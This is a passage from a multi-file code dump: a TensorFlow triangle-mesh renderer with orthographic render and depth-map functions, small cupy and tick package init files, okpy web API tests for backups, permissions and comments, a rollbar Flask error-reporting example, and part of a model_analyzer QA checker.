pixel_attributes = tf.transpose(pixel_attributes, perm=[0, 2, 1])
pixel_attributes = tf.matmul(mtx_ext, pixel_attributes)
pixel_attributes = tf.transpose(pixel_attributes, perm=[0, 2, 1])
pixel_attributes = tf.reshape(pixel_attributes, shape=[batch_size, image_height, image_width, 4])
depth_map = pixel_attributes[:, :, :, 2]
pixel_mask = alpha > 0.5
pixel_mask = tf.cast(pixel_mask, dtype=tf.float32)
depth_map = tf.reverse(depth_map, axis=[1])
pixel_mask = tf.reverse(pixel_mask, axis=[1])
return depth_map, pixel_mask
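# Usage sketch (placeholder tensors, illustration only): given the same
# matrices used for rendering, depth_map holds camera-space z per pixel and
# pixel_mask marks mesh coverage, so background pixels can be zeroed out.
#
#     depth, mask = mesh_depthmap_camera(verts, tris, mtx_ext, cam, proj, 256, 256)
#     masked_depth = depth * mask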
# ortho
def mesh_rendererOrtho_camera(vertices, triangles, normals, diffuse_colors,
mtx_camera, mtx_perspective_frustrum, light_positions, light_intensities,
image_width, image_height, ambient_color=None, background=-1
):
"""Renders an input scene using phong shading, and returns an output image.
Args:
vertices: 3-D float32 tensor with shape [batch_size, vertex_count, 3]. Each
triplet is an xyz position in world space.
triangles: 2-D int32 tensor with shape [triangle_count, 3]. Each triplet
should contain vertex indices describing a triangle such that the
triangle's normal points toward the viewer if the forward order of the
triplet defines a clockwise winding of the vertices. Gradients with
respect to this tensor are not available.
normals: 3-D float32 tensor with shape [batch_size, vertex_count, 3]. Each
triplet is the xyz vertex normal for its corresponding vertex. Each
vector is assumed to be already normalized.
diffuse_colors: 3-D float32 tensor with shape [batch_size,
vertex_count, 3]. The RGB diffuse reflection in the range [0,1] for
each vertex.
mtx_camera: 3-D tensor with shape [batch_size, 4, 4] or 2-D tensor with
shape [4, 4] specifying the camera model view matrix
mtx_perspective_frustrum: 3-D tensor with shape [batch_size, 4, 4] or 2-D tensor with
shape [4, 4] specifying the perspective and frustrum matrix
light_positions: a 3-D tensor with shape [batch_size, light_count, 3]. The
XYZ position of each light in the scene. In the same coordinate space as
pixel_positions.
light_intensities: a 3-D tensor with shape [batch_size, light_count, 3]. The
RGB intensity values for each light. Intensities may be above one.
image_width: int specifying desired output image width in pixels.
image_height: int specifying desired output image height in pixels.
ambient_color: a 2D tensor with shape [batch_size, 3]. The RGB ambient
color, which is added to each pixel in the scene. If None, it is
assumed to be black.
Returns:
A 4-D float32 tensor of shape [batch_size, image_height, image_width, 4]
containing the lit RGBA color values for each image at each pixel. RGB
colors are the intensity values before tonemapping and can be in the range
[0, infinity]. Clipping to the range [0,1] with tf_render.clip_by_value is likely
reasonable for both viewing and training most scenes. More complex scenes
with multiple lights should tone map color values for display only. One
simple tonemapping approach is to rescale color values as x/(1+x); gamma
compression is another common technique. Alpha values are zero for
background pixels and near one for mesh pixels.
Raises:
ValueError: An invalid argument to the method is detected.
"""
if len(vertices.shape) != 3:
raise ValueError('Vertices must have shape [batch_size, vertex_count, 3].')
batch_size = vertices.shape[0].value
if len(normals.shape) != 3:
raise ValueError('Normals must have shape [batch_size, vertex_count, 3].')
if len(light_positions.shape) != 3:
raise ValueError(
'Light_positions must have shape [batch_size, light_count, 3].')
if len(light_intensities.shape) != 3:
raise ValueError(
'Light_intensities must have shape [batch_size, light_count, 3].')
if len(diffuse_colors.shape) != 3:
raise ValueError(
'vertex_diffuse_colors must have shape [batch_size, vertex_count, 3].')
if (ambient_color is not None and
ambient_color.get_shape().as_list() != [batch_size, 3]):
raise ValueError('Ambient_color must have shape [batch_size, 3].')
# TODO: Debug Shape
if mtx_camera.get_shape().as_list() == [4, 4]:
mtx_camera = tf.tile(
tf.expand_dims(mtx_camera, axis=0), [batch_size, 1, 1])
elif mtx_camera.get_shape().as_list() != [batch_size, 4, 4]:
raise ValueError('mtx_camera must have shape [batch_size, 4, 4]')
if mtx_perspective_frustrum.get_shape().as_list() == [4, 4]:
mtx_perspective_frustrum = tf.tile(
tf.expand_dims(mtx_perspective_frustrum, axis=0), [batch_size, 1, 1])
elif mtx_perspective_frustrum.get_shape().as_list() != [batch_size, 4, 4]:
raise ValueError('mtx_perspective_frustrum must have shape [batch_size, 4, 4]')
vertex_attributes = tf.concat([normals, vertices, diffuse_colors], axis=2)
clip_space_transforms = tf.matmul(mtx_perspective_frustrum, mtx_camera, name="mtx_clip_space_transforms_batch")
pixel_attributes, alpha, tri_ids = rasterize_triangles(
vertices, vertex_attributes, triangles, clip_space_transforms,
image_width, image_height, [background] * vertex_attributes.shape[2].value)
# Extract the interpolated vertex attributes from the pixel buffer and
# supply them to the shader:
pixel_normals = tf.nn.l2_normalize(pixel_attributes[:, :, :, 0:3], dim=3)
pixel_positions = pixel_attributes[:, :, :, 3:6]
diffuse_colors = pixel_attributes[:, :, :, 6:9]
pixel_mask = tf.cast(tf.reduce_any(diffuse_colors >= 0, axis=3), tf.float32)
renders = phong_shader(
normals=pixel_normals,
alphas=pixel_mask,
pixel_positions=pixel_positions,
light_positions=light_positions,
light_intensities=light_intensities,
diffuse_colors=diffuse_colors,
camera_position=None,
specular_colors=None,
shininess_coefficients=None,
ambient_color=ambient_color)
#return renders, pixel_mask
pixel_mask = alpha > 0.5
pixel_mask = tf.cast(pixel_mask, dtype=tf.float32)
pixel_mask = tf.reverse(pixel_mask, axis=[1])
return renders, pixel_mask
def mesh_depthmapOrtho_camera(vertices, triangles,
mtx_ext, mtx_perspective_frustrum, image_width, image_height
):
"""Renders an input scene using phong shading, and returns an output image.
Args:
vertices: 3-D float32 tensor with shape [batch_size, vertex_count, 3]. Each
triplet is an xyz position in world space.
triangles: 2-D int32 tensor with shape [triangle_count, 3]. Each triplet
should contain vertex indices describing a triangle such that the
triangle's normal points toward the viewer if the forward order of the
triplet defines a clockwise winding of the vertices. Gradients with
respect to this tensor are not available.
normals: 3-D float32 tensor with shape [batch_size, vertex_count, 3]. Each
triplet is the xyz vertex normal for its corresponding vertex. Each
vector is assumed to be already normalized.
mtx_camera: 3-D tensor with shape [batch_size, 4, 4] or 2-D tensor with
shape [4, 4] specifying the camera model view matrix
mtx_perspective_frustrum: 3-D tensor with shape [batch_size, 4, 4] or 2-D tensor with
shape [4, 4] specifying the perspective and frustrum matrix
camera_position: 2-D tensor with shape [batch_size, 3] or 1-D tensor with
shape [3] specifying the XYZ world space camera position.
image_width: int specifying desired output image width in pixels.
image_height: int specifying desired output image height in pixels.
Returns:
A 4-D float32 tensor of shape [batch_size, image_height, image_width, 4]
containing the lit RGBA color values for each image at each pixel. RGB
colors are the intensity values before tonemapping and can be in the range
[0, infinity]. Clipping to the range [0,1] with tf_render.clip_by_value is likely
reasonable for both viewing and training most scenes. More complex scenes
with multiple lights should tone map color values for display only. One
simple tonemapping approach is to rescale color values as x/(1+x); gamma
compression is another common techinque. Alpha values are zero for
background pixels and near one for mesh pixels.
Raises:
ValueError: An invalid argument to the method is detected.
"""
if len(vertices.shape) != 3:
raise ValueError('Vertices must have shape [batch_size, vertex_count, 3].')
batch_size = vertices.shape[0].value
# TODO: Debug Shape
if mtx_ext.get_shape().as_list() == [4, 4]:
mtx_ext = tf.tile(
tf.expand_dims(mtx_ext, axis=0), [batch_size, 1, 1])
elif mtx_ext.get_shape().as_list() != [batch_size, 4, 4]:
raise ValueError('mtx_ext must have shape [batch_size, 4, 4]')
if mtx_perspective_frustrum.get_shape().as_list() == [4, 4]:
mtx_perspective_frustrum = tf.tile(
tf.expand_dims(mtx_perspective_frustrum, axis=0), [batch_size, 1, 1])
elif mtx_perspective_frustrum.get_shape().as_list() != [batch_size, 4, 4]:
raise ValueError('mtx_perspective_frustrum must have shape [batch_size, 4, 4]')
# vertex attribute of depthmap is only z
vertex_attributes = vertices
#vertex_attributes = tf_render.expand_dims(vertex_attributes, -1)
# camera_matrices = camera_utils.look_at(camera_position, camera_lookat,
# camera_up)
#
# perspective_transforms = camera_utils.perspective(image_width / image_height,
# fov_y, near_clip, far_clip)
clip_space_transforms = tf.matmul(mtx_perspective_frustrum, mtx_ext, name="mtx_clip_space_transforms_batch")
pixel_attributes, alpha, _ = rasterize_triangles(
vertices, vertex_attributes, triangles, clip_space_transforms,
image_width, image_height, [99999999] * vertex_attributes.shape[2].value)
# Extract the interpolated vertex attributes from the pixel buffer and
# supply them to the shader:
filler_homo = tf.ones(shape=[pixel_attributes.shape[0], pixel_attributes.shape[1], pixel_attributes.shape[2], 1])
pixel_attributes = tf.concat([pixel_attributes, filler_homo], axis=3)
pixel_attributes = tf.reshape(pixel_attributes, shape=[batch_size, -1, 4])
pixel_attributes = tf.transpose(pixel_attributes, perm=[0, 2, 1])
pixel_attributes = tf.matmul(mtx_ext, pixel_attributes)
pixel_attributes = tf.transpose(pixel_attributes, perm=[0, 2, 1])
pixel_attributes = tf.reshape(pixel_attributes, shape=[batch_size, image_height, image_width, 4])
depth_map = pixel_attributes[:, :, :, 2]
pixel_mask = alpha > 0.5
pixel_mask = tf.cast(pixel_mask, dtype=tf.float32)
depth_map = tf.reverse(depth_map, axis=[1])
pixel_mask = tf.reverse(pixel_mask, axis=[1])
return depth_map, pixel_mask |
cupyx/fallback_mode/__init__.py | prkhrsrvstv1/cupy | 6,180 | 12776416 | <reponame>prkhrsrvstv1/cupy
from cupy import _util
# Attributes and Methods for fallback_mode
# Auto-execute numpy method when corresponding cupy method is not found
# "NOQA" to suppress flake8 warning
from cupyx.fallback_mode.fallback import numpy # NOQA
_util.experimental('cupyx.fallback_mode.numpy')
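# Illustrative sketch (not part of the module): code written against this
# proxy runs on CuPy when a CuPy implementation exists and transparently
# falls back to NumPy otherwise, as described above.
#
#     from cupyx.fallback_mode import numpy as np
#     a = np.arange(10)  # dispatched to cupy.arange when available
#     # calls with no CuPy counterpart are executed by NumPy instead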
|
tick/solver/history/__init__.py | sumau/tick | 411 | 12776419 | # License: BSD 3 clause
# import tick.base
from .history import History
__all__ = ["History"]
|
tests/test_api.py | chrononyan/ok | 148 | 12776431 | <filename>tests/test_api.py
import datetime as dt
import dateutil.parser
import json
import random
from server.models import (Client, db, Assignment, Backup, Comment, Course,
User, Version, Group)
from server.utils import encode_id
from tests import OkTestCase
class TestApi(OkTestCase):
def _test_backup(self, submit, delay=10, success=True):
self.setup_course()
email = self.user1.email
self.login(email)
user = User.lookup(email)
course = self.course
assignment = self.assignment
# Offset the due date & lock_dates
assignment.due_date = assignment.due_date + dt.timedelta(hours=delay)
assignment.lock_date = assignment.lock_date + dt.timedelta(days=delay)
okversion = Version(name="ok-client", current_version="v1.5.0",
download_link="http://localhost/ok")
db.session.add(okversion)
db.session.commit()
data = {
'assignment': assignment.name,
'messages': {
'file_contents': {
'hog.py': 'print("Hello world!")'
}
},
'submit': submit,
}
response = self.client.post('/api/v3/backups/?client_version=v1.5.0',
data=json.dumps(data),
headers=[('Content-Type', 'application/json')])
backup = Backup.query.filter(Backup.submitter_id == user.id).first()
assert backup is not None
if success or not submit:
assert response.json['data'] == {
'email': email,
'key': encode_id(backup.id),
'course': {
'id': course.id,
'offering': course.offering,
'display_name': course.display_name,
'active': course.active,
'timezone': 'America/Los_Angeles'
},
'assignment': assignment.name
}
self.assert_200(response)
if not success:
self.assert_403(response)
submit = False
assert response.json['data'] == {
'data': {
'backup': True,
'late': True
}
}
assert backup.assignment == assignment
assert backup.submitter_id == user.id
assert len(backup.messages) == len(data['messages'])
assert backup.submit == submit
def test_backup(self):
self._test_backup(False)
def test_backup_after_deadline(self):
self._test_backup(False, delay=-2)
def test_submit(self):
self._test_backup(True)
def test_submit_after_deadline(self):
self._test_backup(True, delay=-2, success=False)
def test_api(self):
response = self.client.get('/api/v3/')
self.assert_200(response)
assert response.json['data'] == {
'version': 'v3',
'url': '/api/v3/',
'documentation': 'https://okpy.github.io/documentation',
'github': 'https://github.com/okpy/ok'
}
assert response.json['message'] == 'success'
assert response.json['code'] == 200
def test_no_envelope(self):
response = self.client.get('/api/v3/?envelope=false')
self.assert_200(response)
assert 'data' not in response.json
assert 'message' not in response.json
assert 'code' not in response.json
assert response.json['version'] == 'v3'
def test_non_existant_api(self):
response = self.client.get('/api/v3/doesnotexist')
self.assert_404(response)
assert response.json['data'] == {}
assert response.json['code'] == 404
def test_get_backup(self):
self._test_backup(False)
backup = Backup.query.first()
submission_time = (self.assignment.due_date
- dt.timedelta(days=random.randrange(0, 10)))
backup.custom_submission_time = submission_time
response = self.client.get('/api/v3/backups/{}/'.format(backup.hashid))
self.assert_200(response)
course = backup.assignment.course
user_json = {
"email": backup.submitter.email,
"id": encode_id(backup.submitter_id),
}
response_json = response.json['data']
time_threshold = dt.timedelta(seconds=5)
self.assertAlmostEqual(dateutil.parser.parse(response_json['created']),
backup.created,
delta=time_threshold)
self.assertAlmostEqual(dateutil.parser.parse(response_json['submission_time']),
submission_time,
delta=time_threshold)
self.assertAlmostEqual(dateutil.parser.parse(response_json['messages'][0]['created']),
backup.created,
delta=time_threshold)
# Unset timestamps already tested.
del response_json['created']
del response_json['submission_time']
del response_json['messages'][0]['created']
assert response_json == {
"submitter": user_json,
"submit": backup.submit,
"group": [user_json],
"is_late": backup.is_late,
"external_files": [],
"assignment": {
"name": backup.assignment.name,
"course": {
"id": course.id,
"active": course.active,
"display_name": course.display_name,
"offering": course.offering,
"timezone": course.timezone.zone,
},
},
"id": backup.hashid,
"messages": [
{
"kind": "file_contents",
"contents": backup.files(),
},
],
}
def test_bad_hashid(self):
self.setup_course()
response = self.client.get('/api/v3/backups/xyzxyz/')
self.assert_401(response)
assert response.json['data'] == {}
assert response.json['code'] == 401
self.login(self.user1.email)
response = self.client.get('/api/v3/backups/xyzxyz/')
self.assert_404(response)
assert response.json['data'] == {}
assert response.json['code'] == 404
def test_version_api(self):
okversion = Version(name="ok", current_version="v1.5.0",
download_link="http://localhost/ok")
db.session.add(okversion)
ok2version = Version(name="ok2", current_version="v2.5.0",
download_link="http://localhost/ok2")
db.session.add(ok2version)
response = self.client.get('/api/v3/version/')
self.assert_200(response)
assert response.json['data'] == {
'results': [
{
"current_version": "v1.5.0",
"download_link": "http://localhost/ok",
"name": "ok"
},
{
"current_version": "v2.5.0",
"download_link": "http://localhost/ok2",
"name": "ok2"
}
]
}
assert response.json['message'] == 'success'
response = self.client.get('/api/v3/version/ok')
self.assert_200(response)
assert response.json['data'] == {
'results': [
{
"current_version": "v1.5.0",
"download_link": "http://localhost/ok",
"name": "ok"
}
]
}
self.setup_course()
self.login(self.user1.email)
response = self.client.post('/api/v3/version/ok', data={
'current_version': 'v1.5.1',
'download_link': 'http://localhost/versions/v1.5.1/ok',
})
self.assert_403(response)
self.login(self.staff1.email)
response = self.client.post('/api/v3/version/ok', data={
'current_version': 'v1.5.1',
'download_link': 'http://localhost/versions/v1.5.1/ok',
})
# Staff members do not have permission to edit versions
self.assert_403(response)
self.login(self.admin.email)
response = self.client.post('/api/v3/version/ok', data={
'current_version': 'v1.5.1',
'download_link': 'http://example.com/doesnotexist',
})
self.assert_400(response)
response = self.client.post('/api/v3/version/ok', data={
'current_version': 'v1.5.1',
'download_link': 'http://example.com',
})
self.assert_200(response)
response = self.client.get('/api/v3/version/')
assert response.json['data'] == {
'results': [
{
"current_version": "v1.5.1",
"download_link": "http://example.com",
"name": "ok"
},
{
"current_version": "v2.5.0",
"download_link": "http://localhost/ok2",
"name": "ok2"
}
]
}
response = self.client.get('/api/v3/version/ok')
self.assert_200(response)
assert response.json['data'] == {
'results': [
{
"current_version": "v1.5.1",
"download_link": "http://example.com",
"name": "ok"
}
]
}
def test_score_anon(self):
response = self.client.post('/api/v3/score/')
self.assert_401(response)
assert response.json['code'] == 401
def test_score_student(self):
self._test_backup(True)
email = self.user1.email
self.login(email)
user = User.lookup(email)
response = self.client.post('/api/v3/score/')
self.assert_400(response)
assert response.json['code'] == 400
backup = Backup.query.filter(Backup.submitter_id == user.id).first()
data = {'bid': encode_id(backup.id), 'kind': 'Total',
'score': 128.2, 'message': 'wow'}
response = self.client.post('/api/v3/score/', data=data)
self.assert_401(response)
assert response.json['code'] == 401
def test_export_user(self):
self._test_backup(True)
student = User.lookup(self.user1.email)
self.login(self.staff1.email)
backup = Backup.query.filter(Backup.submitter_id == student.id).first()
endpoint = '/api/v3/assignment/{0}/export/{1}'.format(self.assignment.name,
student.email)
response = self.client.get(endpoint)
self.assert_200(response)
backups = response.json['data']['backups']
self.assertEqual(len(backups), 1)
self.assertTrue('submission_time' in backups[0])
self.assertEqual(backups[0]['submission_time'], backups[0]['created'])
self.assertEqual(response.json['data']['count'], 1)
self.assertEqual(response.json['data']['limit'], 150)
self.assertEqual(response.json['data']['offset'], 0)
self.assertEqual(response.json['data']['has_more'], False)
response = self.client.get(endpoint + "?offset=20&limit=2")
self.assert_200(response)
backups = response.json['data']['backups']
self.assertEqual(len(backups), 0)
self.assertEqual(response.json['data']['count'], 1)
self.assertEqual(response.json['data']['limit'], 2)
self.assertEqual(response.json['data']['offset'], 20)
self.assertEqual(response.json['data']['has_more'], False)
def test_export_final(self):
self._test_backup(True)
student = User.lookup(self.user1.email)
backup = Backup.query.filter(Backup.submitter_id == student.id).first()
endpoint = '/api/v3/assignment/{0}/submissions/'.format(self.assignment.name)
response = self.client.get(endpoint)
self.assert_403(response)
self.login(self.staff1.email)
response = self.client.get(endpoint)
self.assert_200(response)
backups = response.json['data']['backups']
self.assertEqual(len(backups), 1)
self.assertEqual(backups[0]['is_late'], False)
self.assertEqual(len(backups[0]['group']), 1)
self.assertEqual(backups[0]['group'][0]['email'], self.user1.email)
self.assertEqual(len(backups[0]['messages']), 1)
self.assertEqual(response.json['data']['count'], 1)
self.assertEqual(response.json['data']['has_more'], False)
self.assertEqual(response.json['data']['offset'], 0)
response = self.client.get(endpoint + '?offset=1')
self.assert_200(response)
backups = response.json['data']['backups']
self.assertEqual(len(backups), 0)
self.assertEqual(response.json['data']['count'], 1)
self.assertEqual(response.json['data']['has_more'], False)
self.assertEqual(response.json['data']['offset'], 1)
def test_assignment_api(self):
self._test_backup(True)
student = User.lookup(self.user1.email)
endpoint = '/api/v3/assignment/{0}'.format(self.assignment.name)
# View a public assignment
response = self.client.get(endpoint)
self.assert_200(response)
# Change assignment to be hidden
self.assignment.visible = False
db.session.commit()
response = self.client.get(endpoint)
self.assert_403(response)
self.assignment.visible = True
db.session.commit()
self.login(self.staff1.email)
response = self.client.get(endpoint)
self.assert_200(response)
self.assertEqual(response.json['data']['name'], self.assignment.name)
# Hidden assignment, but should be visible to staff
self.assignment.visible = False
db.session.commit()
response = self.client.get(endpoint)
self.assert_200(response)
self.login(self.user1.email)
self.assignment.visible = False
db.session.commit()
response = self.client.get(endpoint)
self.assert_403(response)
def test_group_api(self):
self._test_backup(True)
self.logout()
student = User.lookup(self.user1.email)
Group.invite(self.user1, self.user2, self.assignment)
group = Group.lookup(self.user1, self.assignment)
group.accept(self.user2)
base_api = '/api/v3/assignment/{0}/group/{1}'
endpoint = base_api.format(self.assignment.name, self.user1.email)
response = self.client.get(endpoint)
self.assert_401(response)
self.login(self.user1.email)
response = self.client.get(endpoint)
self.assert_200(response)
members = response.json['data']['members']
self.assertEqual(len(members), 2)
assert 'email' in members[0]['user']
# Make sure user2 can access user1's endpoint
self.login(self.user2.email)
response = self.client.get(endpoint)
self.assert_200(response)
members = response.json['data']['members']
self.assertEqual(len(members), 2)
assert 'email' in members[1]['user']
self.login(self.staff1.email)
response = self.client.get(endpoint)
self.assert_200(response)
members = response.json['data']['members']
self.assertEqual(len(members), 2)
assert 'email' in members[0]['user']
# Login as some random user
self.login(self.user3.email)
response = self.client.get(endpoint)
self.assert_403(response)
# Check for existence of email
response = self.client.get(base_api.format(self.assignment.name, '<EMAIL>'))
self.assert_403(response)
self.login(self.admin.email)
response = self.client.get(base_api.format(self.assignment.name, '<EMAIL>'))
self.assert_404(response)
def test_score_staff(self):
self._test_backup(True)
user = User.lookup(self.user1.email)
self.login(self.staff1.email)
response = self.client.post('/api/v3/score/')
self.assert_400(response)
assert response.json['code'] == 400
backup = Backup.query.filter(Backup.submitter_id == user.id).first()
data = {'bid': encode_id(backup.id), 'kind': 'Total',
'score': 128.2, 'message': 'wow'}
response = self.client.post('/api/v3/score/', data=data)
self.assert_200(response)
assert response.json['code'] == 200
self.logout()
self.login(self.admin.email)
data = {'bid': encode_id(backup.id), 'kind': 'Total',
'score': 128.2, 'message': 'wow'}
response = self.client.post('/api/v3/score/', data=data)
self.assert_200(response)
assert response.json['code'] == 200
def test_comment_staff(self):
self._test_backup(True)
user = User.lookup(self.user1.email)
self.login(self.staff1.email)
backup = Backup.query.filter(Backup.submitter_id == user.id).first()
comment_url = "/api/v3/backups/{}/comment/".format(encode_id(backup.id))
response = self.client.post(comment_url)
self.assert_400(response) # Not all fields present
assert response.json['code'] == 400
data = {'line': 2, 'filename': 'fizzbuzz.py',
'message': 'wow'}
response = self.client.post(comment_url, data=data)
self.assert_200(response)
assert response.json['code'] == 200
self.logout()
self.login(self.admin.email)
data = {'line': 2, 'filename': 'fizzbuzz.py',
'message': 'wow'}
response = self.client.post(comment_url, data=data)
self.assert_200(response)
assert response.json['code'] == 200
# Check that another student is not able to comment
self.login(self.user2.email)
data = {'line': 2, 'filename': 'fizzbuzz.py',
'message': 'wow'}
response = self.client.post(comment_url, data=data)
self.assert_403(response)
assert response.json['code'] == 403
def test_get_comments(self):
self._test_backup(True)
user = User.lookup(self.user1.email)
staff = User.lookup(self.staff1.email)
backup = Backup.query.filter(Backup.submitter_id == user.id).first()
comment_url = "/api/v3/backups/{}/comment/".format(encode_id(backup.id))
comment1 = Comment(
backup=backup,
author_id = staff.id,
filename = 'fizzbuzz.py',
line = 2,
message = 'hello world'
)
comment2 = Comment(
backup=backup,
author_id = staff.id,
filename = 'fizzbuzz.py',
line = 5,
message = 'wow'
)
db.session.add(comment1)
db.session.add(comment2)
db.session.commit()
#check to see if student can view comments on own backup's comments
self.login(self.user1.email)
response = self.client.get(comment_url)
self.assert_200(response)
self.assertEqual(len(response.json['data']['comments']), 2)
self.assertEqual(response.json['data']['comments'][0]['message'], 'hello world')
self.assertEqual(response.json['data']['comments'][1]['message'], 'wow')
self.logout()
#check to see if staff can access comments
self.login(self.staff1.email)
response = self.client.get(comment_url)
self.assert_200(response)
self.logout()
#check to see another student can't see others' backup's comments
self.login(self.user2.email)
response = self.client.get(comment_url)
self.assert_403(response)
self.logout()
def test_create_assignment(self):
self.setup_course()
self.login(self.staff1.email)
response = self.client.post("/api/v3/assignment/" + self.course.offering + "/newassignment", json={
'display_name': 'API Test Assignment',
'due_date': '2016-11-07T06:59:59',
'lock_date': '2016-11-08T06:59:59',
})
self.assert200(response)
assignment = Assignment.query.filter_by(name=self.course.offering + '/newassignment').one()
self.assertEqual(assignment.display_name, 'API Test Assignment')
self.assertEqual(assignment.due_date.day, 7)
response = self.client.post("/api/v3/assignment/" + self.course.offering + "/newassignment", json={
'display_name': 'API Test Assignment',
'due_date': '2016-11-10T06:59:59',
'lock_date': '2016-11-11T06:59:59',
})
self.assert200(response)
assignment = Assignment.query.filter_by(name=self.course.offering + '/newassignment').one()
self.assertEqual(assignment.due_date.day, 10)
self.login(self.user1.email)
response = self.client.post("/api/v3/assignment/" + self.course.offering + "/newassignment2", json={
'display_name': 'API Test Assignment',
'due_date': '2016-11-07T06:59:59',
'lock_date': '2016-11-08T06:59:59',
})
self.assert403(response)
assignment = Assignment.query.filter_by(name=self.course.offering + '/newassignment2').one_or_none()
self.assertEqual(assignment, None)
def test_user_api(self):
self._test_backup(True)
self.logout()
student = User.lookup(self.user1.email)
def test_both_endpoints(user):
base_api = '/api/v3/user/{0}'
user1_endpoint = base_api.format(user.email)
current_user_endpoint = base_api.format('')
current = self.client.get(current_user_endpoint)
specific = self.client.get(user1_endpoint)
return current, specific
current, specific = test_both_endpoints(student)
self.assert_401(current)
self.assert_401(specific)
# Should be able to view self
self.login(self.user1.email)
current, specific = test_both_endpoints(student)
self.assert_200(current)
self.assert_200(specific)
members = current.json['data']['participations']
self.assertEqual(len(members), 1)
self.assertEqual(current.json['data'], specific.json['data'])
# Staff don't get permission
self.login(self.staff1.email)
current, specific = test_both_endpoints(student)
self.assert_200(current)
self.assert_403(specific)
# Login as some random user
self.login(self.user3.email)
current, specific = test_both_endpoints(student)
self.assert_200(current)
self.assert_403(specific)
# Admins should have access
self.login(self.admin.email)
current, specific = test_both_endpoints(student)
self.assert_200(current)
self.assert_200(specific)
self.assertEqual(specific.json['data']['email'], student.email)
# Lab Assistants don't have access
self.login(self.lab_assistant1.email)
current, specific = test_both_endpoints(student)
self.assert_200(current)
self.assert_403(specific)
def test_course_enrollment(self):
self._test_backup(True)
student = User.lookup(self.user1.email)
courses = student.enrollments()
course = courses[0]
student_endpoint = '/api/v3/course/cal/cs61a/sp16/enrollment'
self.login(self.staff1.email)
response = self.client.get(student_endpoint)
self.assert_200(response)
student_emails = [s['email'] for s in response.json['data']['student']]
self.assertEqual(self.user1.email in student_emails, True)
self.login(self.user1.email)
response = self.client.get(student_endpoint)
self.assert_403(response)
def test_course_assignments(self):
self._test_backup(True)
student = User.lookup(self.user1.email)
courses = student.enrollments()
course = courses[0]
student_endpoint = '/api/v3/course/cal/cs61a/sp16/assignments'
anon_response = self.client.get(student_endpoint)
self.assert_200(anon_response)
active_assignments = len([a for a in self.course.assignments if a.active])
self.assertEqual(active_assignments, len(anon_response.json['data']['assignments']))
self.login(self.staff1.email)
auth_response = self.client.get(student_endpoint)
self.assert_200(auth_response)
self.assertEqual(anon_response.json['data'], auth_response.json['data'])
def test_client(self):
self.setup_course()
self.login(self.staff1.email)
db.session.add(Client(
name='Test Client',
description='',
user=self.staff1,
client_id='test_client',
client_secret='secret',
redirect_uris=[],
default_scopes=['all'],
is_confidential=False
))
response = self.client.get('/api/v3/client/test_client')
self.assertEqual(
response.json['data'],
{'allowed_redirects': [], 'client_id': 'test_client', 'client_name': '<NAME>', 'description': '',
'is_confidential': False, 'owner_email': '<EMAIL>'}
)
response = self.client.post('/api/v3/client/test_client/redirect_urls', json={'url': 'test'})
self.assert_200(response)
response = self.client.get('/api/v3/client/test_client')
self.assertEqual(response.json['data']['allowed_redirects'], ['test'])
self.login(self.admin.email)
response = self.client.post('/api/v3/client/test_client/redirect_urls', json={'url': 'test2'})
self.assert_200(response)
response = self.client.get('/api/v3/client/test_client')
self.assertEqual(response.json['data']['allowed_redirects'], ['test', 'test2'])
self.login(self.staff2.email)
response = self.client.post('/api/v3/client/test_client/redirect_urls', json={'url': 'test3'})
self.assert_403(response)
response = self.client.get('/api/v3/client/test_client')
self.assert_403(response)
def test_course_grades(self):
self._test_backup(True)
self.login(self.staff1.email)
endpoint = '/api/v3/course/cal/cs61a/sp16/grades'
response = self.client.get(endpoint)
self.assert_200(response)
self.login(self.staff2.email)
endpoint = '/api/v3/course/cal/cs61a/sp16/grades'
response = self.client.get(endpoint)
self.assert_200(response)
self.login(self.user1.email)
endpoint = '/api/v3/course/cal/cs61a/sp16/grades'
response = self.client.get(endpoint)
self.assert_403(response)
self.login(self.user6.email)
endpoint = '/api/v3/course/cal/cs61a/sp16/grades'
response = self.client.get(endpoint)
self.assert_403(response)
self.login(self.admin.email)
endpoint = '/api/v3/course/cal/cs61a/sp16/grades'
response = self.client.get(endpoint)
self.assert_200(response)
def test_course_roster(self):
self._test_backup(True)
self.login(self.staff1.email)
endpoint = '/api/v3/course/cal/cs61a/sp16/roster'
response = self.client.get(endpoint)
self.assert_200(response)
self.login(self.staff2.email)
endpoint = '/api/v3/course/cal/cs61a/sp16/roster'
response = self.client.get(endpoint)
self.assert_200(response)
self.login(self.user1.email)
endpoint = '/api/v3/course/cal/cs61a/sp16/roster'
response = self.client.get(endpoint)
self.assert_403(response)
self.login(self.user6.email)
endpoint = '/api/v3/course/cal/cs61a/sp16/roster'
response = self.client.get(endpoint)
self.assert_403(response)
self.login(self.admin.email)
endpoint = '/api/v3/course/cal/cs61a/sp16/roster'
response = self.client.get(endpoint)
self.assert_200(response)
|
rollbar/examples/flask/app.py | arthurio/pyrollbar | 177 | 12776450 | <filename>rollbar/examples/flask/app.py
# NOTE: pyrollbar requires both `Flask` and `blinker` packages to be installed first
from flask import Flask
from flask import got_request_exception
import rollbar
import rollbar.contrib.flask
app = Flask(__name__)
@app.before_first_request
def init_rollbar():
rollbar.init('ACCESS_TOKEN', environment='development')
# send exceptions from `app` to rollbar, using flask's signal system.
got_request_exception.connect(rollbar.contrib.flask.report_exception, app)
@app.route('/')
def root():
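    # `foo` is intentionally left undefined (an assumed reading of this example):
    # calling it raises a NameError, giving rollbar an exception to report.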
foo()
return '<html><body>Hello World</body></html>'
if __name__ == '__main__':
app.run()
|
qa/L0_stability_steps/check_results.py | MarkMoTrin/model_analyzer | 115 | 12776460 | <filename>qa/L0_stability_steps/check_results.py<gh_stars>100-1000
# Copyright (c) 2021 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
import yaml
class TestOutputValidator:
"""
Functions that validate the output
of the test
"""
def __init__(self, config, test_name, analyzer_log):
self._config = config
self._models = config['profile_models']
self._analyzer_log = analyzer_log
check_function = self.__getattribute__(f'check_{test_name}')
if check_function():
sys.exit(0)
else:
sys.exit(1)
def check_steps_stability(self):
"""
Makes sure that there were the same number of
configurations tried in each search iteration.
"""
with open(self._analyzer_log, 'r+') as f:
log_contents = f.read()
logs_for_iteration = log_contents.split(
'Profiling server only metrics...')[1:]
